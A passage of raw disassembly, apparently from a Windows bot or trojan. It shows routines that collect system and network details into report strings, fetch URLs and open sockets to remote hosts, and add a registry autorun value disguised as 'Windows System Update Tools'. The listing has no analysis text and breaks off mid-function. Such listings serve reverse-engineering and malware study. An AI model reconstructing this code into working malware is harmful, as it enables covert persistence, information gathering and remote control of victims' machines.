cmp [ebp+var_C4], 5Ah
jnz short loc_40BE70
mov [ebp+var_4], offset aMe ; "ME"
jmp short loc_40BE77
; ---------------------------------------------------------------------------
loc_40BE34: ; CODE XREF: sub_40BDAD+33�j
cmp [ebp+var_C8], 5
jnz short loc_40BE70
cmp [ebp+var_C4], ebx
jnz short loc_40BE4E
mov [ebp+var_4], offset a2k ; "2K"
jmp short loc_40BE77
; ---------------------------------------------------------------------------
loc_40BE4E: ; CODE XREF: sub_40BDAD+96�j
cmp [ebp+var_C4], 1
jnz short loc_40BE60
mov [ebp+var_4], offset aXp ; "XP"
jmp short loc_40BE77
; ---------------------------------------------------------------------------
loc_40BE60: ; CODE XREF: sub_40BDAD+A8�j
cmp [ebp+var_C4], 2
mov [ebp+var_4], offset a2003 ; "2003"
jz short loc_40BE77
loc_40BE70: ; CODE XREF: sub_40BDAD+7C�j
; sub_40BDAD+8E�j
mov [ebp+var_4], offset dword_42D4E0
loc_40BE77: ; CODE XREF: sub_40BDAD+73�j
; sub_40BDAD+85�j ...
cmp [ebp+var_BC], 2
jnz short loc_40BEAF
loc_40BE80: ; CODE XREF: sub_40BDAD+61�j
cmp [ebp+var_B8], bl
jz short loc_40BEAF
lea eax, [ebp+var_B8]
push eax
lea eax, [ebp+var_2E8]
push [ebp+var_4]
push offset dword_424340
push eax
call sub_4173AC
lea eax, [ebp+var_2E8]
add esp, 10h
mov [ebp+var_4], eax
loc_40BEAF: ; CODE XREF: sub_40BDAD+54�j
; sub_40BDAD+D1�j ...
mov ax, word_42D4DC
push 3Fh
mov [ebp+var_25C], ax
pop ecx
xor eax, eax
lea edi, [ebp+var_25A]
rep stosd
stosw
mov eax, dword_4412A4
mov [ebp+var_C], 100h
cmp eax, ebx
jz short loc_40BEE8
lea ecx, [ebp+var_C]
push ecx
lea ecx, [ebp+var_25C]
push ecx
call eax ; GetUserNameA
loc_40BEE8: ; CODE XREF: sub_40BDAD+12C�j
push [ebp+arg_4]
call sub_40AFAB
pop ecx
push eax
call dword_4413F8 ; inet_addr
mov [ebp+var_8], eax
push 2
lea eax, [ebp+var_8]
push 4
push eax
call dword_441370 ; gethostbyaddr
cmp eax, ebx
jz short loc_40BF11
push dword ptr [eax]
jmp short loc_40BF16
; ---------------------------------------------------------------------------
loc_40BF11: ; CODE XREF: sub_40BDAD+15E�j
push offset aCouldnTResolve ; "couldn't resolve host"
loc_40BF16: ; CODE XREF: sub_40BDAD+162�j
lea eax, [ebp+var_3E4]
push eax
call sub_4173AC
pop ecx
lea eax, [ebp+var_4E8]
pop ecx
push 104h
push eax
nop
call near ptr 7C814EEAh
lea eax, [ebp+var_114]
push 46h
push eax
push offset aDdMmmYyyy ; "dd:MMM:yyyy"
push ebx
mov esi, 409h
push ebx
push esi
nop
call near ptr 7C8361EEh
lea eax, [ebp+var_15C]
push 46h
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
nop
call near ptr 7C83632Dh
push 20h
lea eax, [ebp+var_38]
push ebx
push eax
call sub_417430
add esp, 0Ch
lea eax, [ebp+var_38]
push eax
nop
call near ptr 7C8310F2h
push ebx
push ebx
lea eax, [ebp+var_18]
push ebx
push eax
lea eax, [ebp+var_4E8]
push eax
call sub_418AA8
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_7E8]
push eax
call sub_40D6CA
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_7E8]
rep movsd
push 60h
lea esi, [ebp+var_7E8]
pop ecx
lea edi, [ebp+var_668]
rep movsd
push ebx
call sub_40BBF6
add esp, 20h
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_25C]
push eax
push [ebp+arg_4]
call sub_40AFAB
pop ecx
push eax
lea eax, [ebp+var_3E4]
push eax
lea eax, [ebp+var_4E8]
push eax
lea eax, [ebp+var_5E8]
push [ebp+var_C0]
push [ebp+var_C4]
push [ebp+var_C8]
push [ebp+var_4]
push eax
lea eax, [ebp+var_568]
push eax
mov eax, [ebp+var_2C]
shr eax, 0Ah
push ebx
push eax
call sub_40D5BA
pop ecx
pop ecx
push eax
mov eax, [ebp+var_30]
shr eax, 0Ah
push ebx
push eax
call sub_40D5BA
pop ecx
pop ecx
push eax
call sub_40BCF7
push edx
push eax
push offset aSysinfoCpuI64u ; "[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB"...
push 200h
push [ebp+arg_0]
call sub_41792A
mov eax, [ebp+arg_0]
add esp, 50h
pop edi
pop esi
pop ebx
leave
retn
sub_40BDAD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C061 proc near ; CODE XREF: sub_40F6F1+464B�p
; sub_40F6F1+5B45�p
var_8C = byte ptr -8Ch
var_C = byte ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8Ch
push esi
mov esi, 80h
push esi
lea eax, [ebp+var_8C]
push 0
push eax
call sub_417430
add esp, 0Ch
cmp dword_4414A0, 0
jnz short loc_40C0D5
push 0
lea eax, [ebp+var_8C]
push esi
push eax
lea eax, [ebp+var_C]
push eax
call dword_441288 ; InternetGetConnectedStateExA
test eax, eax
jnz short loc_40C0B6
lea eax, [ebp+var_8C]
push offset dword_42D554
push eax
call sub_4173AC
pop ecx
pop ecx
loc_40C0B6: ; CODE XREF: sub_40C061+40�j
test [ebp+var_C], 1
jz short loc_40C0CE
push offset dword_42D54C
loc_40C0C1: ; CODE XREF: sub_40C061+72�j
lea eax, [ebp+var_8]
push eax
call sub_4173AC
pop ecx
pop ecx
jmp short loc_40C0F4
; ---------------------------------------------------------------------------
loc_40C0CE: ; CODE XREF: sub_40C061+59�j
push offset off_42D548
jmp short loc_40C0C1
; ---------------------------------------------------------------------------
loc_40C0D5: ; CODE XREF: sub_40C061+28�j
mov esi, offset off_42D544
lea eax, [ebp+var_8]
push esi
push eax
call sub_4173AC
lea eax, [ebp+var_8C]
push esi
push eax
call sub_4173AC
add esp, 10h
loc_40C0F4: ; CODE XREF: sub_40C061+6B�j
push [ebp+arg_4]
push [ebp+arg_8]
call sub_40AFAB
pop ecx
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_8]
push eax
push offset aNetinfoTypeSS_ ; "[NETINFO]: [Type]: %s (%s). [IP Address"...
push 200h
push [ebp+arg_0]
call sub_41792A
mov eax, [ebp+arg_0]
add esp, 1Ch
pop esi
leave
retn
sub_40C061 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40C127 proc near ; CODE XREF: sub_40F326+14B�p
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
lea eax, [ebp+var_4]
push edi
push eax
push [ebp+arg_0]
call sub_4203E2
sub_40C127 endp
; ---------------------------------------------------------------------------
mov esi, eax
test esi, esi
jz loc_40C1CF
push esi
call sub_417BEE
mov edi, eax
pop ecx
test edi, edi
jz short loc_40C1CF
push edi
push esi
push dword ptr [ebp-4]
push dword ptr [ebp+8]
call sub_4203DC
; ---------------------------------------------------------------------------
test eax, eax
jz short loc_40C1AA
lea eax, [ebp-0Ch]
push eax
lea eax, [ebp-8]
push eax
push offset dword_42D564
push edi
call sub_4203D6
; ---------------------------------------------------------------------------
test eax, eax
jz short loc_40C1C8
mov eax, [ebp-8]
mov ecx, [eax+0Ch]
shr ecx, 10h
cmp cx, 0A28h
jnz short loc_40C1C8
movzx eax, word ptr [eax+0Ch]
cmp eax, 884h
jz short loc_40C1C3
cmp eax, 9C9h
jz short loc_40C1BF
cmp eax, 0A7Dh
jz short loc_40C1BB
cmp eax, 0B4Ch
jz short loc_40C1B7
loc_40C1AA: ; CODE XREF: ___:0040C161�j
xor esi, esi
loc_40C1AC: ; CODE XREF: ___:0040C1C6�j
push edi
call sub_417C62
pop ecx
mov eax, esi
jmp short loc_40C1D1
; ---------------------------------------------------------------------------
loc_40C1B7: ; CODE XREF: ___:0040C1A8�j
push 2
jmp short loc_40C1C5
; ---------------------------------------------------------------------------
loc_40C1BB: ; CODE XREF: ___:0040C1A1�j
push 4
jmp short loc_40C1C5
; ---------------------------------------------------------------------------
loc_40C1BF: ; CODE XREF: ___:0040C19A�j
push 3
jmp short loc_40C1C5
; ---------------------------------------------------------------------------
loc_40C1C3: ; CODE XREF: ___:0040C193�j
push 1
loc_40C1C5: ; CODE XREF: ___:0040C1B9�j
; ___:0040C1BD�j ...
pop esi
jmp short loc_40C1AC
; ---------------------------------------------------------------------------
loc_40C1C8: ; CODE XREF: ___:0040C178�j
; ___:0040C188�j
push edi
call sub_417C62
pop ecx
loc_40C1CF: ; CODE XREF: ___:0040C13F�j
; ___:0040C150�j
xor eax, eax
loc_40C1D1: ; CODE XREF: ___:0040C1B5�j
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C1D5 proc near ; DATA XREF: sub_40F6F1+4BFF�o
var_65C = byte ptr -65Ch
var_55C = byte ptr -55Ch
var_35C = dword ptr -35Ch
var_358 = byte ptr -358h
var_2D8 = byte ptr -2D8h
var_258 = byte ptr -258h
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
var_1D0 = dword ptr -1D0h
var_1C8 = byte ptr -1C8h
var_148 = byte ptr -148h
var_C8 = byte ptr -0C8h
var_48 = dword ptr -48h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 65Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 65h
mov esi, eax
pop ecx
lea edi, [ebp+var_35C]
rep movsd
push 1
mov edi, 80h
pop esi
xor ebx, ebx
mov [eax+190h], esi
push edi
lea eax, [ebp+var_148]
push ebx
push eax
mov [ebp+var_C], ebx
mov [ebp+var_4], ebx
mov [ebp+var_8], offset dword_42D688
call sub_417430
push edi
lea eax, [ebp+var_1C8]
push ebx
push eax
call sub_417430
push edi
lea eax, [ebp+var_C8]
push ebx
push eax
call sub_417430
push 100h
lea eax, [ebp+var_65C]
push ebx
push eax
call sub_417430
push 3Ch
lea eax, [ebp+var_48]
pop edi
push edi
push ebx
push eax
call sub_417430
add esp, 3Ch
lea eax, [ebp+var_48]
mov [ebp+var_48], edi
mov [ebp+var_34], esi
push eax
lea eax, [ebp+var_358]
push ebx
push eax
mov [ebp+var_28], esi
mov [ebp+var_20], esi
mov [ebp+var_18], esi
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_358]
push eax
call dword_4412C0 ; InternetCrackUrlA
test eax, eax
jz loc_40C36F
cmp [ebp+var_34], ebx
jbe short loc_40C2AC
push [ebp+var_34]
lea eax, [ebp+var_148]
push [ebp+var_38]
push eax
call sub_4182F0
add esp, 0Ch
loc_40C2AC: ; CODE XREF: sub_40C1D5+C0�j
cmp [ebp+var_28], ebx
movzx esi, [ebp+var_30]
jbe short loc_40C2CA
push [ebp+var_28]
lea eax, [ebp+var_1C8]
push [ebp+var_2C]
push eax
call sub_4182F0
add esp, 0Ch
loc_40C2CA: ; CODE XREF: sub_40C1D5+DE�j
cmp [ebp+var_20], ebx
jbe short loc_40C2E4
push [ebp+var_20]
lea eax, [ebp+var_C8]
push [ebp+var_24]
push eax
call sub_4182F0
add esp, 0Ch
loc_40C2E4: ; CODE XREF: sub_40C1D5+F8�j
cmp [ebp+var_18], ebx
jbe short loc_40C2FE
push [ebp+var_18]
lea eax, [ebp+var_65C]
push [ebp+var_1C]
push eax
call sub_4182F0
add esp, 0Ch
loc_40C2FE: ; CODE XREF: sub_40C1D5+112�j
push ebx
push ebx
lea eax, [ebp+var_C8]
push 3
push eax
lea eax, [ebp+var_1C8]
push eax
lea eax, [ebp+var_148]
push esi
push eax
push dword_441368
call dword_44138C ; InternetConnectA
mov esi, eax
cmp esi, ebx
jz short loc_40C387
push ebx
lea eax, [ebp+var_8]
push 200h
push eax
lea eax, [ebp+var_2D8]
push eax
lea eax, [ebp+var_65C]
push ebx
push eax
push ebx
push esi
call dword_441380 ; HttpOpenRequestA
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_40C38E
push ebx
push ebx
push ebx
push ebx
push eax
call dword_441334 ; HttpSendRequestA
test eax, eax
jz short loc_40C368
push offset dword_42D65C
jmp short loc_40C393
; ---------------------------------------------------------------------------
loc_40C368: ; CODE XREF: sub_40C1D5+18A�j
push offset unk_42D610
jmp short loc_40C393
; ---------------------------------------------------------------------------
loc_40C36F: ; CODE XREF: sub_40C1D5+B7�j
lea eax, [ebp+var_55C]
push offset dword_42D5E4
push eax
call sub_4173AC
mov esi, [ebp+var_C]
pop ecx
pop ecx
jmp short loc_40C3A1
; ---------------------------------------------------------------------------
loc_40C387: ; CODE XREF: sub_40C1D5+153�j
push offset unk_42D5A8
jmp short loc_40C393
; ---------------------------------------------------------------------------
loc_40C38E: ; CODE XREF: sub_40C1D5+17B�j
push offset unk_42D568
loc_40C393: ; CODE XREF: sub_40C1D5+191�j
; sub_40C1D5+198�j ...
lea eax, [ebp+var_55C]
push eax
call sub_4173AC
pop ecx
pop ecx
loc_40C3A1: ; CODE XREF: sub_40C1D5+1B0�j
cmp [ebp+var_1D4], ebx
jnz short loc_40C3CC
push ebx
lea eax, [ebp+var_55C]
push [ebp+var_1D0]
push eax
lea eax, [ebp+var_258]
push eax
push [ebp+var_35C]
call sub_40DC10
add esp, 14h
loc_40C3CC: ; CODE XREF: sub_40C1D5+1D2�j
lea eax, [ebp+var_55C]
push eax
call sub_40C4F7
pop ecx
push esi
call dword_4413EC ; InternetCloseHandle
push [ebp+var_4]
call dword_4413EC ; InternetCloseHandle
push [ebp+var_1D8]
call sub_417174
pop ecx
push ebx
nop
call near ptr 7C80C058h
pop edi
pop esi
pop ebx
sub_40C1D5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C3FF proc near ; CODE XREF: sub_40F6F1+4581�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
push edi
mov esi, offset dword_446090
mov edi, 0B8h
loc_40C413: ; CODE XREF: sub_40C3FF+33�j
cmp byte ptr [esi], 0
jz short loc_40C436
push [ebp+arg_0]
push esi
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz short loc_40C436
inc [ebp+var_4]
add esi, edi
cmp esi, offset dword_446C10
jl short loc_40C413
jmp short loc_40C478
; ---------------------------------------------------------------------------
loc_40C436: ; CODE XREF: sub_40C3FF+17�j
; sub_40C3FF+26�j
mov esi, [ebp+var_4]
push ebx
imul esi, 0B8h
push edi
push 0
lea ebx, dword_446090[esi]
push ebx
call sub_417430
push 17h
push [ebp+arg_0]
push ebx
call sub_4182F0
push 9Fh
lea eax, dword_4460A8[esi]
push [ebp+arg_4]
push eax
call sub_4182F0
add esp, 24h
inc dword_430B28
pop ebx
loc_40C478: ; CODE XREF: sub_40C3FF+35�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_40C3FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C47F proc near ; CODE XREF: sub_40F6F1+5C77�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset dword_42D698
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
add esp, 14h
xor edi, edi
mov esi, offset dword_446090
loc_40C4A9: ; CODE XREF: sub_40C47F+72�j
cmp byte ptr [esi], 0
jz short loc_40C4E4
lea eax, [esi+18h]
push eax
push esi
push edi
push offset dword_42D68C
lea eax, [ebp+var_200]
push 200h
push eax
call sub_41792A
push 1
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
add esp, 2Ch
loc_40C4E4: ; CODE XREF: sub_40C47F+2D�j
add esi, 0B8h
inc edi
cmp esi, offset dword_446C10
jl short loc_40C4A9
pop edi
pop esi
leave
retn
sub_40C47F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C4F7 proc near ; CODE XREF: sub_401000+97�p
; sub_4010B2+314�p ...
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
lea eax, [ebp+var_10]
push edi
push eax
nop
call near ptr 7C80A7D4h
mov ebx, offset dword_445788
mov edi, 80h
mov esi, offset dword_441788
loc_40C519: ; CODE XREF: sub_40C4F7+3D�j
cmp byte ptr [ebx], 0
jz short loc_40C530
push 7Fh
lea eax, [ebx+80h]
push ebx
push eax
call sub_4182F0
add esp, 0Ch
loc_40C530: ; CODE XREF: sub_40C4F7+25�j
sub ebx, edi
cmp ebx, esi
jge short loc_40C519
movzx eax, [ebp+var_4]
push [ebp+arg_0]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset a_2d_2d4d_2d_2d ; "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
push edi
push esi
call sub_41792A
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_40C4F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C56B proc near ; CODE XREF: sub_407B45+15B�p
; ___:00407E7C�p ...
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_80]
push [ebp+arg_0]
push 80h
push eax
call sub_418BEF
lea eax, [ebp+var_80]
push eax
call sub_40C4F7
add esp, 14h
leave
retn
sub_40C56B endp
; =============== S U B R O U T I N E =======================================
sub_40C597 proc near ; CODE XREF: sub_40F6F1+5B76�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, offset dword_441788
xor ecx, ecx
loc_40C59E: ; CODE XREF: sub_40C597+13�j
mov [eax], cl
add eax, 80h
cmp eax, offset dword_445788
jl short loc_40C59E
cmp [esp+arg_C], ecx
push esi
mov esi, offset dword_42D6CC
jnz short loc_40C5CE
push ecx
push [esp+8+arg_8]
push esi
push [esp+10h+arg_4]
push [esp+14h+arg_0]
call sub_40DC10
add esp, 14h
loc_40C5CE: ; CODE XREF: sub_40C597+1F�j
push esi
call sub_40C4F7
pop ecx
pop esi
retn
sub_40C597 endp
; =============== S U B R O U T I N E =======================================
sub_40C5D7 proc near ; CODE XREF: sub_403E35+2B3�p
arg_0 = dword ptr 4
push esi
mov esi, offset dword_441788
loc_40C5DD: ; CODE XREF: sub_40C5D7+27�j
cmp byte ptr [esi], 0
jz short loc_40C5F2
push [esp+4+arg_0]
push esi
call sub_40A8E4
pop ecx
test eax, eax
pop ecx
jnz short loc_40C604
loc_40C5F2: ; CODE XREF: sub_40C5D7+9�j
add esi, 80h
cmp esi, offset dword_445788
jl short loc_40C5DD
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40C604: ; CODE XREF: sub_40C5D7+19�j
push 1
pop eax
pop esi
retn
sub_40C5D7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C609 proc near ; DATA XREF: sub_40F6F1+5C23�o
var_31C = byte ptr -31Ch
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 31Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 45h
pop ecx
mov esi, eax
lea edi, [ebp+var_11C]
push 1
rep movsd
xor edx, edx
pop edi
cmp [ebp+var_10], edx
mov [ebp+var_8], 80h
mov [ebp+var_4], edx
mov [eax+110h], edi
jnz short loc_40C65C
push edx
lea eax, [ebp+var_118]
push [ebp+var_14]
push offset dword_42D720
push eax
push [ebp+var_11C]
call sub_40DC10
add esp, 14h
loc_40C65C: ; CODE XREF: sub_40C609+33�j
cmp [ebp+var_98], 0
jz short loc_40C67C
lea eax, [ebp+var_98]
push eax
call sub_41791F
test eax, eax
pop ecx
mov [ebp+var_4], eax
jz short loc_40C67C
mov [ebp+var_8], eax
loc_40C67C: ; CODE XREF: sub_40C609+5A�j
; sub_40C609+6E�j
and [ebp+arg_0], 0
mov esi, offset dword_441788
loc_40C685: ; CODE XREF: sub_40C609+D4�j
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_8]
jge short loc_40C6DF
cmp byte ptr [esi], 0
jz short loc_40C6CE
cmp [ebp+var_98], 0
jz short loc_40C6B4
cmp [ebp+var_4], 0
jnz short loc_40C6B4
lea eax, [ebp+var_98]
push eax
push esi
call sub_40A8E4
pop ecx
test eax, eax
pop ecx
jz short loc_40C6CE
loc_40C6B4: ; CODE XREF: sub_40C609+90�j
; sub_40C609+96�j
push edi
lea eax, [ebp+var_118]
push [ebp+var_14]
push esi
push eax
push [ebp+var_11C]
call sub_40DC10
add esp, 14h
loc_40C6CE: ; CODE XREF: sub_40C609+87�j
; sub_40C609+A9�j
inc [ebp+arg_0]
add esi, 80h
cmp esi, offset dword_445788
jl short loc_40C685
loc_40C6DF: ; CODE XREF: sub_40C609+82�j
lea eax, [ebp+var_31C]
push offset dword_42D6F4
push eax
call sub_4173AC
xor esi, esi
pop ecx
cmp [ebp+var_10], esi
pop ecx
jnz short loc_40C719
push esi
lea eax, [ebp+var_31C]
push [ebp+var_14]
push eax
lea eax, [ebp+var_118]
push eax
push [ebp+var_11C]
call sub_40DC10
add esp, 14h
loc_40C719: ; CODE XREF: sub_40C609+EE�j
lea eax, [ebp+var_31C]
push eax
call sub_40C4F7
push [ebp+var_18]
call sub_417174
pop ecx
pop ecx
push esi
nop
call near ptr 7C80C058h
pop edi
pop esi
sub_40C609 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C738 proc near ; CODE XREF: sub_40ABB7+1E�p
; ___:0040EFB8�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, offset dword_42D748
xor esi, esi
mov ebx, offset aWindowsSystemU ; "Windows System Update Tools"
loc_40C74B: ; CODE XREF: sub_40C738+69�j
lea eax, [ebp+var_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push dword ptr [edi+4]
push dword ptr [edi]
call dword_44136C ; RegCreateKeyExA
cmp [ebp+arg_0], esi
jz short loc_40C785
push [ebp+arg_0]
call sub_417AF0
pop ecx
push eax
push [ebp+arg_0]
push 1
push esi
push ebx
push [ebp+var_4]
call dword_4413DC ; RegSetValueExA
jmp short loc_40C78F
; ---------------------------------------------------------------------------
loc_40C785: ; CODE XREF: sub_40C738+2F�j
push ebx
push [ebp+var_4]
call dword_441324 ; RegDeleteValueA
loc_40C78F: ; CODE XREF: sub_40C738+4B�j
push [ebp+var_4]
call dword_441394 ; RegCloseKey
add edi, 8
cmp edi, offset dword_42D760
jl short loc_40C74B
pop edi
pop esi
pop ebx
leave
retn
sub_40C738 endp
; ---------------------------------------------------------------------------
dword_40C7A8 dd 42474FFh, 0FFFF87E8h, 35FF59FFh, 42D740h, 5C84E890h
; DATA XREF: ___:0040F184�o
dd 0E8EB7C3Fh
; =============== S U B R O U T I N E =======================================
sub_40C7C0 proc near ; CODE XREF: sub_40C7FB+56�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov edx, [esp+arg_0]
push esi
or esi, 0FFFFFFFFh
test eax, eax
jz short loc_40C7F5
push ebx
push edi
lea edi, [eax]
mov ecx, 0FFh
loc_40C7D9: ; CODE XREF: sub_40C7C0+31�j
mov al, [edx]
mov ebx, esi
and eax, ecx
and ebx, ecx
xor eax, ebx
shr esi, 8
mov eax, dword_421210[eax*4]
xor esi, eax
inc edx
dec edi
jnz short loc_40C7D9
pop edi
pop ebx
loc_40C7F5: ; CODE XREF: sub_40C7C0+E�j
mov eax, esi
pop esi
not eax
retn
sub_40C7C0 endp
; =============== S U B R O U T I N E =======================================
sub_40C7FB proc near ; CODE XREF: sub_40D091+24A�p
var_10 = dword ptr -10h
arg_0 = dword ptr 4
push ebx
push esi
xor ebx, ebx
push edi
push ebx
call sub_417BEE
mov [esp+10h+var_10], offset aRb ; "rb"
push [esp+10h+arg_0]
mov esi, eax
call sub_41823A
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz short loc_40C84A
loc_40C820: ; CODE XREF: sub_40C7FB+4D�j
test byte ptr [edi+0Ch], 10h
jnz short loc_40C84E
inc ebx
push ebx
push esi
call sub_418C3F
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_40C84A
push edi
push 1
lea eax, [esi+ebx-1]
push 1
push eax
call sub_418132
add esp, 10h
jmp short loc_40C820
; ---------------------------------------------------------------------------
loc_40C84A: ; CODE XREF: sub_40C7FB+23�j
; sub_40C7FB+39�j
xor eax, eax
jmp short loc_40C869
; ---------------------------------------------------------------------------
loc_40C84E: ; CODE XREF: sub_40C7FB+29�j
dec ebx
push ebx
push esi
call sub_40C7C0
push esi
mov ebx, eax
call sub_417C62
push edi
call sub_4180DC
add esp, 10h
mov eax, ebx
loc_40C869: ; CODE XREF: sub_40C7FB+51�j
pop edi
pop esi
pop ebx
retn
sub_40C7FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C86D proc near ; CODE XREF: sub_40C8F3+33�p
; sub_40CE56+BC�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0
push 1
push 2
call dword_441438 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jz short loc_40C8E9
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_417430
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_4]
call dword_4413B8 ; ntohs
push [ebp+arg_0]
mov [ebp+var_E], ax
call dword_4413F8 ; inet_addr
cmp eax, esi
jnz short loc_40C8CE
push [ebp+arg_0]
call dword_44143C ; gethostbyname
test eax, eax
jz short loc_40C8E9
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
loc_40C8CE: ; CODE XREF: sub_40C86D+4B�j
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call dword_441360 ; connect
cmp eax, esi
jnz short loc_40C8ED
push edi
call dword_441450 ; closesocket
loc_40C8E9: ; CODE XREF: sub_40C86D+1B�j
; sub_40C86D+58�j
mov eax, esi
jmp short loc_40C8EF
; ---------------------------------------------------------------------------
loc_40C8ED: ; CODE XREF: sub_40C86D+73�j
mov eax, edi
loc_40C8EF: ; CODE XREF: sub_40C86D+7E�j
pop edi
pop esi
leave
retn
sub_40C86D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C8F3 proc near ; DATA XREF: sub_40F6F1+A88�o
var_11B4 = byte ptr -11B4h
var_1B4 = byte ptr -1B4h
var_1AC = byte ptr -1ACh
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 11B4h
call sub_417B70
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1B4]
rep movsd
push 1
pop esi
push [ebp+var_14]
mov [eax+1B0h], esi
lea eax, [ebp+var_1AC]
push eax
call sub_40C86D
mov ebx, eax
pop ecx
cmp ebx, 0FFFFFFFFh
pop ecx
jnz short loc_40C986
lea eax, [ebp+var_11B4]
push offset dword_42D7E4
push eax
call sub_4173AC
xor edi, edi
pop ecx
cmp [ebp+var_8], edi
pop ecx
jnz short loc_40C969
push edi
lea eax, [ebp+var_11B4]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push ebx
call sub_40DC10
add esp, 14h
loc_40C969: ; CODE XREF: sub_40C8F3+59�j
lea eax, [ebp+var_11B4]
push eax
call sub_40C4F7
push [ebp+var_10]
call sub_417174
pop ecx
pop ecx
push esi
nop
call near ptr 7C80C058h
loc_40C986: ; CODE XREF: sub_40C8F3+3F�j
push offset byte_43C63C
push ebx
call sub_40BA41
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_40C9F1
lea eax, [ebp+var_11B4]
push offset dword_42D7A4
push eax
call sub_4173AC
xor edi, edi
pop ecx
cmp [ebp+var_8], edi
pop ecx
jnz short loc_40C9CD
push edi
lea eax, [ebp+var_11B4]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push ebx
call sub_40DC10
add esp, 14h
loc_40C9CD: ; CODE XREF: sub_40C8F3+BD�j
